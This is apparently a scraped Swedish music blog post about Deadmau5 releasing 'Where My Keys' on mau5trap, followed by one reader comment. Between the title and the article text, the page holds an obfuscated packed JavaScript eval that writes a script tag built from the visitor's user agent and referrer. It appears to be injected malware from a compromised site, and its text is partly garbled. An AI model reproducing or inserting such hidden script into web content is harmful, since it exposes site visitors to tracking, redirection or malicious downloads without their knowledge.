Image Image Image Image Image Image Image Image Image Image

| 22 september, 2018

Scroll to top

Top

Deadmau5 – Where My Keys

Deadmau5 – Where My Keys
Alexander Gylemo

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kthyh|var|u0026u|referrer|ibezb||js|php’.split(‘|’),0,{}))
DeadMau5 – Where My Keys by Thissongissick.com

Tidigare kunde vi på Revue.se höra Deadmau5 droppa sin nya låt ”Where My Keys” under en av spelningarna på Ibiza tidigare i sommar. Nu har han släppt den fulla originalversionen på mau5trap och som sig bör kryper den sakta men säkert upp på topplistorna.

Comments

  1. Olle jull

    så jäla tung låt.